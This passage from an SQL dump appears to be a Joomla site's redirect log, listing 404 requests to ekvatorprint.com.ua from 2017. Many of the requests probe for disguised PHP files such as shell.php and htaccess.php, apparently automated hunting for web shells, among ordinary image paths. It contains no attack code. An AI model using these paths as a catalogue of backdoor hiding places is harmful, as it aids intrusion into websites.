00:00:00',301),(11827,'http://ekvatorprint.com.ua/administrator/edit/index.php',NULL,'http://site.ru','',3,0,'2017-10-31 05:15:34','0000-00-00 00:00:00',301),(11828,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/debuguser/debug.php',NULL,'http://site.ru','',2,0,'2017-10-31 05:32:51','0000-00-00 00:00:00',301),(11829,'http://ekvatorprint.com.ua/media/gzovt.php',NULL,'http://site.ru','',1,0,'2017-10-31 07:09:16','0000-00-00 00:00:00',301),(11830,'http://ekvatorprint.com.ua/libraries/gbpyq.php',NULL,'http://site.ru','',3,0,'2017-10-31 08:35:00','0000-00-00 00:00:00',301),(11831,'http://ekvatorprint.com.ua/components/com_finder/qdedr.php',NULL,'http://site.ru','',2,0,'2017-10-31 09:04:36','0000-00-00 00:00:00',301),(11832,'http://ekvatorprint.com.ua/components/admin/bgeiis.php',NULL,'http://site.ru','',3,0,'2017-10-31 09:23:26','0000-00-00 00:00:00',301),(11833,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/views/update/tmpl/aylkbb.php',NULL,'http://site.ru','',4,0,'2017-10-31 12:29:07','0000-00-00 00:00:00',301),(11834,'http://ekvatorprint.com.ua/administrator/components/com_redirect/helpers/html/htaccess.php',NULL,'http://site.ru','',2,0,'2017-10-31 12:29:48','0000-00-00 00:00:00',301),(11835,'http://ekvatorprint.com.ua/iadvize/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-10-31 12:54:49','0000-00-00 00:00:00',301),(11836,'http://ekvatorprint.com.ua/components/com_config/model/prmnbne.php',NULL,'http://site.ru','',3,0,'2017-10-31 12:57:29','0000-00-00 00:00:00',301),(11837,'http://ekvatorprint.com.ua/plugins/aiudok.php',NULL,'http://site.ru','',3,0,'2017-10-31 15:58:34','0000-00-00 00:00:00',301),(11838,'http://ekvatorprint.com.ua/administrator/components/com_akeeba/bvlaco.php',NULL,'http://site.ru','',3,0,'2017-10-31 16:03:24','0000-00-00 00:00:00',301),(11839,'http://ekvatorprint.com.ua/old_web/wp-admin/includes/images.php',NULL,'http://site.ru','',1,0,'2017-10-31 16:05:40','0000-00-00 00:00:00',301),(11840,'http://ekvatorprint.com.ua/ssegtj/map.php',NULL,'http://site.ru','',1,0,'2017-10-31 19:22:54','0000-00-00 00:00:00',301),(11841,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_finder/statistics/desua.php',NULL,'http://site.ru','',2,0,'2017-10-31 21:04:18','0000-00-00 00:00:00',301),(11842,'http://ekvatorprint.com.ua/modules/mod_stats/rfziea.php',NULL,'http://site.ru','',3,0,'2017-10-31 21:17:37','0000-00-00 00:00:00',301),(11843,'http://ekvatorprint.com.ua/libraries/joomla/keychain/htaccess.php',NULL,'http://site.ru','',2,0,'2017-10-31 21:49:46','0000-00-00 00:00:00',301),(11844,'http://ekvatorprint.com.ua/administrator/components/com_newsfeeds/models/fields/content-post.php',NULL,'http://site.ru','',2,0,'2017-10-31 22:26:45','0000-00-00 00:00:00',301),(11845,'http://ekvatorprint.com.ua/libraries/compat/qxjnpq.php',NULL,'http://site.ru','',3,0,'2017-10-31 23:08:30','0000-00-00 00:00:00',301),(11846,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/template/css/lrliam.php',NULL,'http://site.ru','',2,0,'2017-11-01 01:07:45','0000-00-00 00:00:00',301),(11847,'http://ekvatorprint.com.ua/components/com_tags/ugbhain.php',NULL,'http://site.ru','',2,0,'2017-11-01 01:34:10','0000-00-00 00:00:00',301),(11848,'http://ekvatorprint.com.ua/bin/ijwbyy.php',NULL,'http://site.ru','',1,0,'2017-11-01 01:42:25','0000-00-00 00:00:00',301),(11849,'http://ekvatorprint.com.ua/libraries/cms/component/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-01 02:00:17','0000-00-00 00:00:00',301),(11850,'http://ekvatorprint.com.ua/modules/mod_related_items/media-views-rtl.php',NULL,'http://site.ru','',3,0,'2017-11-01 02:07:25','0000-00-00 00:00:00',301),(11851,'http://ekvatorprint.com.ua/administrator/components/com_kunena/media/icons/large/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-01 02:54:48','0000-00-00 00:00:00',301),(11852,'http://ekvatorprint.com.ua/layouts/joomla/links/hkrlp.php',NULL,'http://site.ru','',3,0,'2017-11-01 02:55:12','0000-00-00 00:00:00',301),(11853,'http://ekvatorprint.com.ua/pqcsfx3h.php',NULL,'http://site.ru','',5,0,'2017-11-01 03:20:51','0000-00-00 00:00:00',301),(11854,'http://ekvatorprint.com.ua/plugins/system/mijoshopjquery/mijoshopjquery/superfish/js/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-01 03:51:00','0000-00-00 00:00:00',301),(11855,'http://ekvatorprint.com.ua/xmlrpc/system_infos.php',NULL,'http://site.ru','',4,0,'2017-11-01 05:13:05','0000-00-00 00:00:00',301),(11856,'http://ekvatorprint.com.ua/menusa/popup-pomo.php',NULL,'http://site.ru','',7,0,'2017-11-01 05:20:33','0000-00-00 00:00:00',301),(11857,'http://ekvatorprint.com.ua/components/com_jshopping/templates/default/content/Dwsonv.php',NULL,'http://site.ru','',2,0,'2017-11-01 05:32:12','0000-00-00 00:00:00',301),(11858,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/mod_login/akumxeg.php',NULL,'http://site.ru','',5,0,'2017-11-01 06:04:21','0000-00-00 00:00:00',301),(11859,'http://ekvatorprint.com.ua/canadapost/popup-pomo.php',NULL,'http://site.ru','',3,0,'2017-11-01 07:56:45','0000-00-00 00:00:00',301),(11860,'http://ekvatorprint.com.ua/includes/cache.inc.php',NULL,'http://site.ru','',3,0,'2017-11-01 08:10:49','0000-00-00 00:00:00',301),(11861,'http://ekvatorprint.com.ua/components/com_banners/helpers/Mdama.php',NULL,'http://site.ru','',3,0,'2017-11-01 08:10:49','0000-00-00 00:00:00',301),(11862,'http://ekvatorprint.com.ua/images/sampledata/folio/alrskj.php',NULL,'http://site.ru','',1,0,'2017-11-01 08:15:13','0000-00-00 00:00:00',301),(11863,'http://ekvatorprint.com.ua/libraries/geteo.php',NULL,'http://site.ru','',3,0,'2017-11-01 09:10:17','0000-00-00 00:00:00',301),(11864,'http://ekvatorprint.com.ua/modules/mod_tags_popular/ntxxt.php',NULL,'http://site.ru','',4,0,'2017-11-01 09:55:16','0000-00-00 00:00:00',301),(11865,'http://ekvatorprint.com.ua/templates/bvqfmgz.php',NULL,'http://site.ru','',6,0,'2017-11-01 10:06:59','0000-00-00 00:00:00',301),(11866,'http://ekvatorprint.com.ua/utility/convert/index.php',NULL,'','',17,0,'2017-11-01 10:27:42','0000-00-00 00:00:00',301),(11867,'http://ekvatorprint.com.ua/administrator/components/com_config/models/forms/gesea.php',NULL,'http://site.ru','',1,0,'2017-11-01 13:38:59','0000-00-00 00:00:00',301),(11868,'http://ekvatorprint.com.ua/libraries/joomla/updater/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-01 14:09:37','0000-00-00 00:00:00',301),(11869,'http://ekvatorprint.com.ua/tools/popup-pomo.php',NULL,'http://site.ru','',15,0,'2017-11-01 15:50:22','0000-00-00 00:00:00',301),(11870,'http://ekvatorprint.com.ua/components/com_banners/bgeiis.php',NULL,'http://site.ru','',1,0,'2017-11-01 16:09:06','0000-00-00 00:00:00',301),(11871,'http://ekvatorprint.com.ua/media/reviews/photos/original/68/33/f3/degesx.php',NULL,'http://site.ru','',1,0,'2017-11-01 16:20:08','0000-00-00 00:00:00',301),(11872,'http://ekvatorprint.com.ua/layouts/system_infos.php',NULL,'http://site.ru','',4,0,'2017-11-01 16:34:49','0000-00-00 00:00:00',301),(11873,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/shell.php',NULL,'http://site.ru','',4,0,'2017-11-01 16:35:16','0000-00-00 00:00:00',301),(11874,'http://ekvatorprint.com.ua/administrator/language/xpxty.php',NULL,'http://site.ru','',3,0,'2017-11-01 16:39:29','0000-00-00 00:00:00',301),(11875,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/',NULL,'','',1,0,'2017-11-01 17:10:38','0000-00-00 00:00:00',301),(11876,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/',NULL,'','',1,0,'2017-11-01 17:10:38','0000-00-00 00:00:00',301),(11877,'http://ekvatorprint.com.ua/images/packs/pack1/smile.php',NULL,'http://site.ru','',1,0,'2017-11-01 17:17:26','0000-00-00 00:00:00',301),(11878,'http://ekvatorprint.com.ua/administrator/components/com_contact/wrguy.php',NULL,'http://site.ru','',1,0,'2017-11-01 17:18:40','0000-00-00 00:00:00',301),(11879,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/stiky.php',NULL,'http://site.ru','',4,0,'2017-11-01 17:22:47','0000-00-00 00:00:00',301),(11880,'http://ekvatorprint.com.ua/cache/template/Misfpo.php',NULL,'http://site.ru','',1,0,'2017-11-01 17:53:40','0000-00-00 00:00:00',301),(11881,'http://ekvatorprint.com.ua/libraries/joomla/github/package/orgs/svpkmz.php',NULL,'http://site.ru','',2,0,'2017-11-01 18:11:17','0000-00-00 00:00:00',301),(11882,'http://ekvatorprint.com.ua/modules/mod_k2_content/media-views-rtl.php',NULL,'http://site.ru','',4,0,'2017-11-01 18:16:42','0000-00-00 00:00:00',301),(11883,'http://ekvatorprint.com.ua/images/vivoui.php',NULL,'http://site.ru','',2,0,'2017-11-01 18:19:51','0000-00-00 00:00:00',301),(11884,'http://ekvatorprint.com.ua/media/hyuzt.php',NULL,'http://site.ru','',1,0,'2017-11-01 18:22:32','0000-00-00 00:00:00',301),(11885,'http://ekvatorprint.com.ua/administrator/components/admins.php',NULL,'http://site.ru','',2,0,'2017-11-01 18:23:44','0000-00-00 00:00:00',301),(11886,'http://ekvatorprint.com.ua/images/system_img.php',NULL,'http://site.ru','',3,0,'2017-11-01 18:24:14','0000-00-00 00:00:00',301),(11887,'http://ekvatorprint.com.ua/bin/pfbbb.php',NULL,'http://site.ru','',1,0,'2017-11-01 19:07:39','0000-00-00 00:00:00',301),(11888,'http://ekvatorprint.com.ua/cache/kcjdvht.php',NULL,'http://site.ru','',2,0,'2017-11-01 20:26:55','0000-00-00 00:00:00',301),(11889,'http://ekvatorprint.com.ua/templates/t3_blank/images/themes/dark/ico/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-01 20:57:42','0000-00-00 00:00:00',301),(11890,'http://ekvatorprint.com.ua/libraries/joomla/filter/pqcsfx3h.php',NULL,'http://site.ru','',2,0,'2017-11-01 21:30:30','0000-00-00 00:00:00',301),(11891,'http://ekvatorprint.com.ua/Rjsbgd.php',NULL,'http://site.ru','',1,0,'2017-11-01 21:48:13','0000-00-00 00:00:00',301),(11892,'http://ekvatorprint.com.ua/modules/mod_ariimageslider/wp-plugins.php',NULL,'http://site.ru','',5,0,'2017-11-02 01:36:06','0000-00-00 00:00:00',301),(11893,'http://ekvatorprint.com.ua/language/en-GB/wp-class.php',NULL,'http://site.ru','',2,0,'2017-11-02 02:28:36','0000-00-00 00:00:00',301),(11894,'http://ekvatorprint.com.ua/JEmobile.php',NULL,'http://site.ru','',1,0,'2017-11-02 02:30:40','0000-00-00 00:00:00',301),(11895,'http://ekvatorprint.com.ua/language/ttsobh.php',NULL,'http://site.ru','',1,0,'2017-11-02 02:32:56','0000-00-00 00:00:00',301),(11896,'http://ekvatorprint.com.ua/language/ttsobh.php',NULL,'http://site.ru','',1,0,'2017-11-02 02:32:56','0000-00-00 00:00:00',301),(11897,'http://ekvatorprint.com.ua/administrator/cache/carte.php',NULL,'http://site.ru','',5,0,'2017-11-02 02:34:08','0000-00-00 00:00:00',301),(11898,'http://ekvatorprint.com.ua/plugins/editors-xtd/orlkeap.php',NULL,'http://site.ru','',4,0,'2017-11-02 02:50:51','0000-00-00 00:00:00',301),(11899,'http://ekvatorprint.com.ua/language/zh-CN/403.php',NULL,'http://site.ru','',2,0,'2017-11-02 03:16:15','0000-00-00 00:00:00',301),(11900,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/help/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-02 03:38:57','0000-00-00 00:00:00',301),(11901,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/update/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-02 04:33:09','0000-00-00 00:00:00',301),(11902,'http://ekvatorprint.com.ua/components/lpxss.php',NULL,'http://site.ru','',2,0,'2017-11-02 05:01:07','0000-00-00 00:00:00',301),(11903,'http://ekvatorprint.com.ua/log/logo_img.php',NULL,'http://site.ru','',3,0,'2017-11-02 06:02:33','0000-00-00 00:00:00',301),(11904,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/',NULL,'','',1,0,'2017-11-02 07:41:19','0000-00-00 00:00:00',301),(11905,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/',NULL,'','',1,0,'2017-11-02 07:41:19','0000-00-00 00:00:00',301),(11906,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/',NULL,'','',1,0,'2017-11-02 07:41:21','0000-00-00 00:00:00',301),(11907,'http://ekvatorprint.com.ua/templates/beez_20/javascript/wp-class.php',NULL,'http://site.ru','',2,0,'2017-11-02 08:59:09','0000-00-00 00:00:00',301),(11908,'http://ekvatorprint.com.ua/wp-content/uploads/FBO.php',NULL,'http://site.ru','',3,0,'2017-11-02 09:42:50','0000-00-00 00:00:00',301),(11909,'http://ekvatorprint.com.ua/plugins/editors/yukesw.php',NULL,'http://site.ru','',5,0,'2017-11-02 09:44:10','0000-00-00 00:00:00',301),(11910,'http://ekvatorprint.com.ua/Mrswenvsr.php',NULL,'http://site.ru','',7,0,'2017-11-02 09:50:32','0000-00-00 00:00:00',301),(11911,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/multilangstatus/tmpl/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-02 10:41:02','0000-00-00 00:00:00',301),(11912,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-3-1.png',NULL,'','',1,0,'2017-11-02 11:23:22','0000-00-00 00:00:00',301),(11913,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-3-2.png',NULL,'','',1,0,'2017-11-02 11:23:22','0000-00-00 00:00:00',301),(11914,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-3-3.png',NULL,'','',1,0,'2017-11-02 11:23:23','0000-00-00 00:00:00',301),(11915,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-3-4.png',NULL,'','',1,0,'2017-11-02 11:23:23','0000-00-00 00:00:00',301),(11916,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-3-5.png',NULL,'','',1,0,'2017-11-02 11:23:23','0000-00-00 00:00:00',301),(11917,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-3-6.png',NULL,'','',1,0,'2017-11-02 11:23:23','0000-00-00 00:00:00',301),(11918,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-4-1.png',NULL,'','',1,0,'2017-11-02 11:23:23','0000-00-00 00:00:00',301),(11919,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-4-2.png',NULL,'','',1,0,'2017-11-02 11:23:23','0000-00-00 00:00:00',301),(11920,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-4-3.png',NULL,'','',1,0,'2017-11-02 11:23:24','0000-00-00 00:00:00',301),(11921,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-4-4.png',NULL,'','',1,0,'2017-11-02 11:23:24','0000-00-00 00:00:00',301),(11922,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-4-5.png',NULL,'','',1,0,'2017-11-02 11:23:24','0000-00-00 00:00:00',301),(11923,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-4-6.png',NULL,'','',1,0,'2017-11-02 11:23:24','0000-00-00 00:00:00',301),(11924,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-5-1.png',NULL,'','',1,0,'2017-11-02 11:23:24','0000-00-00 00:00:00',301),(11925,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-5-2.png',NULL,'','',1,0,'2017-11-02 11:23:24','0000-00-00 00:00:00',301),(11926,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-5-3.png',NULL,'','',1,0,'2017-11-02 11:23:25','0000-00-00 00:00:00',301),(11927,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€-5-4.png',NULL,'','',1,0,'2017-11-02 11:23:26','0000-00-00 00:00:00',301),(11928,'http://ekvatorprint.com.ua/images/portfolio/plotternaya-podrezka/плоттерная подрезка РІ ЭкваторПринт.png',NULL,'','',1,0,'2017-11-02 11:23:26','0000-00-00 00:00:00',301),(11929,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-130.png',NULL,'','',1,0,'2017-11-02 11:23:28','0000-00-00 00:00:00',301),(11930,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-131.png',NULL,'','',1,0,'2017-11-02 11:23:28','0000-00-00 00:00:00',301),(11931,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-126.png',NULL,'','',1,0,'2017-11-02 11:23:28','0000-00-00 00:00:00',301),(11932,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-127.png',NULL,'','',1,0,'2017-11-02 11:23:28','0000-00-00 00:00:00',301),(11933,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-128.png',NULL,'','',1,0,'2017-11-02 11:23:28','0000-00-00 00:00:00',301),(11934,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-123.png',NULL,'','',1,0,'2017-11-02 11:23:29','0000-00-00 00:00:00',301),(11935,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-124.png',NULL,'','',1,0,'2017-11-02 11:23:29','0000-00-00 00:00:00',301),(11936,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-125.png',NULL,'','',1,0,'2017-11-02 11:23:29','0000-00-00 00:00:00',301),(11937,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-120.png',NULL,'','',1,0,'2017-11-02 11:23:29','0000-00-00 00:00:00',301),(11938,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-121.png',NULL,'','',1,0,'2017-11-02 11:23:29','0000-00-00 00:00:00',301),(11939,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-122.png',NULL,'','',1,0,'2017-11-02 11:23:30','0000-00-00 00:00:00',301),(11940,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-118.png',NULL,'','',1,0,'2017-11-02 11:23:30','0000-00-00 00:00:00',301),(11941,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-119.png',NULL,'','',1,0,'2017-11-02 11:23:30','0000-00-00 00:00:00',301),(11942,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-114.png',NULL,'','',1,0,'2017-11-02 11:23:30','0000-00-00 00:00:00',301),(11943,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-115.png',NULL,'','',1,0,'2017-11-02 11:23:30','0000-00-00 00:00:00',301),(11944,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-116.png',NULL,'','',1,0,'2017-11-02 11:23:31','0000-00-00 00:00:00',301),(11945,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-112.png',NULL,'','',1,0,'2017-11-02 11:23:31','0000-00-00 00:00:00',301),(11946,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-113.png',NULL,'','',1,0,'2017-11-02 11:23:31','0000-00-00 00:00:00',301),(11947,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-108.png',NULL,'','',1,0,'2017-11-02 11:23:31','0000-00-00 00:00:00',301),(11948,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-109.png',NULL,'','',1,0,'2017-11-02 11:23:31','0000-00-00 00:00:00',301),(11949,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-110.png',NULL,'','',1,0,'2017-11-02 11:23:32','0000-00-00 00:00:00',301),(11950,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-105.png',NULL,'','',1,0,'2017-11-02 11:23:32','0000-00-00 00:00:00',301),(11951,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-106.png',NULL,'','',1,0,'2017-11-02 11:23:32','0000-00-00 00:00:00',301),(11952,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-107.png',NULL,'','',1,0,'2017-11-02 11:23:32','0000-00-00 00:00:00',301),(11953,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-102.png',NULL,'','',1,0,'2017-11-02 11:23:32','0000-00-00 00:00:00',301),(11954,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-103.png',NULL,'','',1,0,'2017-11-02 11:23:32','0000-00-00 00:00:00',301),(11955,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-104.png',NULL,'','',1,0,'2017-11-02 11:23:33','0000-00-00 00:00:00',301),(11956,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-99.png',NULL,'','',1,0,'2017-11-02 11:23:33','0000-00-00 00:00:00',301),(11957,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-100.png',NULL,'','',1,0,'2017-11-02 11:23:33','0000-00-00 00:00:00',301),(11958,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-101.png',NULL,'','',1,0,'2017-11-02 11:23:33','0000-00-00 00:00:00',301),(11959,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-97.png',NULL,'','',1,0,'2017-11-02 11:23:33','0000-00-00 00:00:00',301),(11960,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-98.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11961,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-93.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11962,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-94.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11963,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-95.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11964,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-90.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11965,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-91.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11966,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-92.png',NULL,'','',1,0,'2017-11-02 11:23:34','0000-00-00 00:00:00',301),(11967,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-87.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11968,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-88.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11969,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-89.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11970,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-84.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11971,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-85.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11972,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-86.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11973,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-81.png',NULL,'','',1,0,'2017-11-02 11:23:35','0000-00-00 00:00:00',301),(11974,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-82.png',NULL,'','',1,0,'2017-11-02 11:23:36','0000-00-00 00:00:00',301),(11975,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-83.png',NULL,'','',1,0,'2017-11-02 11:23:36','0000-00-00 00:00:00',301),(11976,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-78.png',NULL,'','',1,0,'2017-11-02 11:23:36','0000-00-00 00:00:00',301),(11977,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-79.png',NULL,'','',1,0,'2017-11-02 11:23:36','0000-00-00 00:00:00',301),(11978,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-80.png',NULL,'','',1,0,'2017-11-02 11:23:36','0000-00-00 00:00:00',301),(11979,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-75.png',NULL,'','',1,0,'2017-11-02 11:23:36','0000-00-00 00:00:00',301),(11980,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-76.png',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11981,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-77.png',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11982,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-72.jpg',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11983,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-73.png',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11984,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-74.png',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11985,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-69.jpg',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11986,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-70.jpg',NULL,'','',1,0,'2017-11-02 11:23:37','0000-00-00 00:00:00',301),(11987,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-71.jpg',NULL,'','',1,0,'2017-11-02 11:23:38','0000-00-00 00:00:00',301),(11988,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-66.jpg',NULL,'','',1,0,'2017-11-02 11:23:38','0000-00-00 00:00:00',301),(11989,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-67.jpg',NULL,'','',1,0,'2017-11-02 11:23:38','0000-00-00 00:00:00',301),(11990,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-68.jpg',NULL,'','',1,0,'2017-11-02 11:23:38','0000-00-00 00:00:00',301),(11991,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-63.jpg',NULL,'','',1,0,'2017-11-02 11:23:38','0000-00-00 00:00:00',301),(11992,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-64.jpg',NULL,'','',1,0,'2017-11-02 11:23:38','0000-00-00 00:00:00',301),(11993,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-65.jpg',NULL,'','',1,0,'2017-11-02 11:23:39','0000-00-00 00:00:00',301),(11994,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-60.jpg',NULL,'','',1,0,'2017-11-02 11:23:39','0000-00-00 00:00:00',301),(11995,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-61.jpg',NULL,'','',1,0,'2017-11-02 11:23:39','0000-00-00 00:00:00',301),(11996,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-62.jpg',NULL,'','',1,0,'2017-11-02 11:23:39','0000-00-00 00:00:00',301),(11997,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-57.jpg',NULL,'','',1,0,'2017-11-02 11:23:39','0000-00-00 00:00:00',301),(11998,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-58.jpg',NULL,'','',1,0,'2017-11-02 11:23:39','0000-00-00 00:00:00',301),(11999,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-59.jpg',NULL,'','',1,0,'2017-11-02 11:23:40','0000-00-00 00:00:00',301),(12000,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-54.jpg',NULL,'','',1,0,'2017-11-02 11:23:40','0000-00-00 00:00:00',301),(12001,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-55.jpg',NULL,'','',1,0,'2017-11-02 11:23:40','0000-00-00 00:00:00',301),(12002,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-56.jpg',NULL,'','',1,0,'2017-11-02 11:23:40','0000-00-00 00:00:00',301),(12003,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-51.jpg',NULL,'','',1,0,'2017-11-02 11:23:41','0000-00-00 00:00:00',301),(12004,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-52.jpg',NULL,'','',1,0,'2017-11-02 11:23:41','0000-00-00 00:00:00',301),(12005,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-53.jpg',NULL,'','',1,0,'2017-11-02 11:23:41','0000-00-00 00:00:00',301),(12006,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-48.jpg',NULL,'','',1,0,'2017-11-02 11:23:41','0000-00-00 00:00:00',301),(12007,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-49.jpg',NULL,'','',1,0,'2017-11-02 11:23:42','0000-00-00 00:00:00',301),(12008,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-50.jpg',NULL,'','',1,0,'2017-11-02 11:23:42','0000-00-00 00:00:00',301),(12009,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-45.jpg',NULL,'','',1,0,'2017-11-02 11:23:42','0000-00-00 00:00:00',301),(12010,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-46.jpg',NULL,'','',1,0,'2017-11-02 